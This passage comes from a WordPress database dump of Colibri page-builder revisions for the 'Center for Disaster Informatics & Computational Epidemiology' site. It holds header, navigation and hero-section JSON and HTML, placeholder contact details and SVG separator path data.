2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',23,'https://gsudice.dataconn.net/?p=411',0,'revision','',0),(412,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path 